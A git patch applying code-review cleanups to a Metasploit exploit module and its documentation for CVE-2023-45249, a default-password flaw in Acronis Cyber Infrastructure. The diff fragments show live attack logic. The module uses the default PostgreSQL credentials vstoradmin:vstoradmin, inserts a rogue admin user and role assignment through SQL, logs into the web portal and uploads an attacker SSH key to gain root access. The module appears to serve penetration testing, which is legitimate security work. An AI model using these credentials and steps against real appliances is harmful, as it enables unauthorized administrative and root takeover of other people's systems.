From d7fa23f30fc997b97dbd83ef39af5fd5cf0c2f63 Mon Sep 17 00:00:00 2001 From: "H00die.Gr3y" <38109035+h00die-gr3y@users.noreply.github.com> Date: Tue, 17 Sep 2024 19:00:48 +0200 Subject: [PATCH] Apply suggestions from code review Co-authored-by: bcoles Co-authored-by: Julien Voisin --- .../acronis_cyber_infra_cve_2023_45249.md | 2 +- .../acronis_cyber_infra_cve_2023_45249.rb | 45 ++++++++++--------- 2 files changed, 25 insertions(+), 22 deletions(-) diff --git a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md index 42958e31ec..c6fea94f1d 100644 --- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md +++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md @@ -118,7 +118,7 @@ Description: cloud-native applications in production environments. This module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database and gain administrative access to the ACI Web Portal. - This opens the door for the attacker to upload ssh keys that enables root acces + This opens the door for the attacker to upload SSH keys that enables root access to the appliance/server. This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world. ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69, diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb index 0b9c851c4b..147d6e70c7 100644 --- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb +++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote cloud-native applications in production environments. This module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database and gain administrative access to the ACI Web Portal. - This opens the door for the attacker to upload ssh keys that enables root acces + This opens the door for the attacker to upload SSH keys that enables root access to the appliance/server. This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world. ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69, @@ -121,8 +121,9 @@ class MetasploitModule < Msf::Exploit::Remote end end - def add_admin_user(username, userid, password) # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin) + def add_admin_user(username, userid, password) + vprint_status("Creating admin user #{username} with userid #{userid}") # add new admin user to the user table @@ -154,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}") return false unless run_query("insert into \"assignment\" values('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F')") - vprint_status("Succesfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.") + vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.") true end @@ -180,8 +181,8 @@ class MetasploitModule < Msf::Exploit::Remote return true end + # Login at the Acronis Cyber Infrastructure web portal def aci_login(name, pwd) - # Login at the Acronis Cyber Infrastructure web portal post_data = { username: name.to_s, password: pwd.to_s @@ -196,13 +197,11 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'), 'data' => post_data.to_s }) - return true if res&.code == 200 - - false + return res&.code == 200 end + # Upload the SSH public key at the Acronis Cyber Infrastructure web portal def upload_sshkey(sshkey) - # Upload the SSH public key at the Acronis Cyber Infrastructure web portal post_data = { key: sshkey.to_s, event: @@ -236,9 +235,8 @@ class MetasploitModule < Msf::Exploit::Remote @timeout = true end + # Return ACI version-release or nil if not found def get_aci_version - # Return ACI version-release or nil if not found - version_release = nil res = send_request_cgi({ 'method' => 'GET', 'ctype' => 'application/json', @@ -247,16 +245,21 @@ class MetasploitModule < Msf::Exploit::Remote }, 'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about') }) - if res&.code == 200 && res.body.include?('storage-release') - # parse json response and get the version - res_json = res.get_json_document - unless res_json.blank? - version = res_json['storage-release']['version'] - release = res_json['storage-release']['release'] - version_release = Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, '')) unless version.nil? || release.nil? - end - return version_release - end + + return unless res&.code == 200 + return unless res.body.include?('storage-release') + + # parse json response and get the version + res_json = res.get_json_document + return if res_json.blank? + + version = res_json['storage-release']['version'] + return if version.nil? + + release = res_json['storage-release']['release'] + return if release.nil? + + Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, '')) end def check @@ -293,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote # create SSH key pair print_status('Creating SSH private and public key.') - k = SSHKey.generate(type: 'RSA', bits: 2048) + k = SSHKey.generate vprint_status(k.private_key) vprint_status("#{k.ssh_public_key} root")